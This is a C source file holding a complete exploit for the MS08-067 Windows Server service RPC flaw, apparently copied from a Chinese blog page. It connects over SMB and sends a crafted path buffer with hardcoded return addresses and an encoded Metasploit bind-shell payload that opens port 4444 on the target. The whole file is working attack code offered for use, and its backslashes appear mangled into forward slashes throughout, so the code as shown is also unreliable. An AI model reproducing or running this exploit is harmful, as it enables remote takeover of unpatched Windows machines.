MS08-067.c

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
#include <memory.h>
#include <wchar.h>
#include "srvsvc.h"
#include "srvsvc_c.c"
#include "mem.h"


#pragma comment(lib,"ws2_32")
#pragma comment(lib,"mpr")
#pragma comment(lib,"rpcrt4.lib")
#pragma comment(lib,"MSVCRT.LIB")

DWORD   dwRetAddr = 0x7ffa0eb8;
DWORD   dwJmpAddr = 0x7ffa0eb7;

/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char sc[] =
"/x83/xEC/x70"  // sub esp, 0x70
"/x29/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xad"
"/x07/xe6/x4a/x83/xeb/xfc/xe2/xf4/x51/x6d/x0d/x07/x45/xfe/x19/xb5"
"/x52/x67/x6d/x26/x89/x23/x6d/x0f/x91/x8c/x9a/x4f/xd5/x06/x09/xc1"
"/xe2/x1f/x6d/x15/x8d/x06/x0d/x03/x26/x33/x6d/x4b/x43/x36/x26/xd3"
"/x01/x83/x26/x3e/xaa/xc6/x2c/x47/xac/xc5/x0d/xbe/x96/x53/xc2/x62"
"/xd8/xe2/x6d/x15/x89/x06/x0d/x2c/x26/x0b/xad/xc1/xf2/x1b/xe7/xa1"
"/xae/x2b/x6d/xc3/xc1/x23/xfa/x2b/x6e/x36/x3d/x2e/x26/x44/xd6/xc1"
"/xed/x0b/x6d/x3a/xb1/xaa/x6d/x0a/xa5/x59/x8e/xc4/xe3/x09/x0a/x1a"
"/x52/xd1/x80/x19/xcb/x6f/xd5/x78/xc5/x70/x95/x78/xf2/x53/x19/x9a"
"/xc5/xcc/x0b/xb6/x96/x57/x19/x9c/xf2/x8e/x03/x2c/x2c/xea/xee/x48"
"/xf8/x6d/xe4/xb5/x7d/x6f/x3f/x43/x58/xaa/xb1/xb5/x7b/x54/xb5/x19"
"/xfe/x54/xa5/x19/xee/x54/x19/x9a/xcb/x6f/xf7/x16/xcb/x54/x6f/xab"
"/x38/x6f/x42/x50/xdd/xc0/xb1/xb5/x7b/x6d/xf6/x1b/xf8/xf8/x36/x22"
"/x09/xaa/xc8/xa3/xfa/xf8/x30/x19/xf8/xf8/x36/x22/x48/x4e/x60/x03"
"/xfa/xf8/x30/x1a/xf9/x53/xb3/xb5/x7d/x94/x8e/xad/xd4/xc1/x9f/x1d"
"/x52/xd1/xb3/xb5/x7d/x61/x8c/x2e/xcb/x6f/x85/x27/x24/xe2/x8c/x1a"
"/xf4/x2e/x2a/xc3/x4a/x6d/xa2/xc3/x4f/x36/x26/xb9/x07/xf9/xa4/x67"
"/x53/x45/xca/xd9/x20/x7d/xde/xe1/x06/xac/x8e/x38/x53/xb4/xf0/xb5"
"/xd8/x43/x19/x9c/xf6/x50/xb4/x1b/xfc/x56/x8c/x4b/xfc/x56/xb3/x1b"
"/x52/xd7/x8e/xe7/x74/x02/x28/x19/x52/xd1/x8c/xb5/x52/x30/x19/x9a"
"/x26/x50/x1a/xc9/x69/x63/x19/x9c/xff/xf8/x36/x22/x42/xc9/x06/x2a"
"/xfe/xf8/x30/xb5/x7d/x07/xe6/x4a";


int MakeBuff(char *Buff,int BufLen);
void Usage(char *ProgName);
int WaitExit();

#define CN      0
#define TW      1

void main(int argc, char *argv[])
{
        NETRESOURCE     lpNetResource;
        char    Username[256] = {0};
        char    Password[256] = {0};
        DWORD   Ret = 0;
        RPC_STATUS status;
        unsigned char * pszUuid = NULL;
        unsigned char * pszProtocolSequence = "ncacn_np";
        unsigned char * pszNetworkAddress = "";
        unsigned char   pszEndpoint[100] = "//pipe//browser";
        unsigned char * pszOptions = NULL;
        unsigned char * pszStringBinding = NULL;

        char    Server[256] = {0};
        char    RemoteName[256] = {0};
        char    Buff[0x700];
        char    Buff2[1000] = {0};
        char    *pBuff2 = (char *)&Buff2;
        char    Buff3[100] = {0};
        int             BufLen = 0;
//      int             i;
        int             ForceAttack = 0;
        int             AntiDEP = 0;

        int             nLanguage = 0;
        DWORD   dwID = 0;

        if(argc != 2)
        {
                Usage(argv[0]);
                return;
        }

        strcpy(Server,argv[1]);
        sprintf(RemoteName,"%s//IPC$",Server);
        pszNetworkAddress = Server;


        if(strlen(Server) == 0)
        {
                Usage(argv[0]);
                return;
        }

        printf("/nMS08-067 Exploit for CN by EMM@ph4nt0m.org/n/n");

        lpNetResource.dwScope=RESOURCE_CONNECTED;
        lpNetResource.dwType =RESOURCETYPE_DISK;
        lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
        lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
        lpNetResource.lpLocalName=NULL;
        lpNetResource.lpRemoteName = RemoteName;
        lpNetResource.lpComment=NULL;
        lpNetResource.lpProvider=NULL;

        Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
        if(Ret != NO_ERROR)
        {
                printf("Make SMB Connection error:%d/n",GetLastError());
                return;
        }

        printf("SMB Connect OK!/n");

        status = RpcStringBindingCompose(pszUuid,
                                                                        pszProtocolSequence,
                                                                        pszNetworkAddress,
                                                                        pszEndpoint,
                                                                        pszOptions,
                                                                        &pszStringBinding);
        if(status != RPC_S_OK)
        {
                return;
        }
        status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
        if(status != RPC_S_OK)
        {
                return;
        }


   RpcTryExcept
    {

                func23(L"ph4nt0m",(wchar_t *)"/x53/x00/x56/x89/x56/x89/x56/x89/x56/x89",(wchar_t *)"/x4D/x00/x56/x89/x56/x89",4,0);


                memset(Buff,0,sizeof(Buff));
                BufLen = MakeBuff(Buff,sizeof(Buff));

                CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
                (DWORD)*(DWORD *)Buff3 = 1;
                func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);

    }
    RpcExcept ( 1 )
    {
        status = RpcExceptionCode();
                if(status == 1726)
                {
                }
                else
                {
                        printf("RpcExceptionCode() = %u/r/n", status );
                        return;
                }
    }
    RpcEndExcept
//*/
        printf("Maybe Patched!/n");


    RpcStringFree( &pszStringBinding );
    RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
        return;
}


#define JMPPOINT        "B041"
int MakeBuff(char *Buff, int BufLen)
{
        int len = 0;
        char tmp[5] = {0};
        int i;

        for(i = 0; i < BufLen/4; i++)
        {
                memset(tmp,0,4);
                sprintf(tmp,"B%03d",i);
//*
                if(memcmp(tmp,JMPPOINT,4) == 0)
                {
                        break;
                }
//*/
                memcpy(Buff + len,tmp,4);
                len += 4;
        }

        memcpy(Buff,L".a//..//..//NN",13*2);

        for(i = 0; i < 6; i++)
        {
                memcpy(Buff + len,&dwRetAddr,4);
                len += 4;
        }

        memcpy(Buff + len,&dwJmpAddr,4);
        len += 4;
        memset(Buff + len,0x48,0x4);
        len += 4;

        memcpy(Buff + len,sc,sizeof(sc) - 1);
        len += sizeof(sc) - 1;

        memcpy(Buff + len,"EMM!",4);
        len += 4;

        memset(Buff + 0x206 * 2,0,2);
        return len;
}

void Usage(char *ProgName)
{
        printf("/n MS08-067 Exploit for CN by EMM@ph4nt0m.org/n/n %s <Server>/n/n",ProgName);
        return;
}

int WaitExit()
{
        Sleep(1000 * 5);
        printf("Send Payload Over!/n");
        ExitProcess(0);
        return 0;
}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值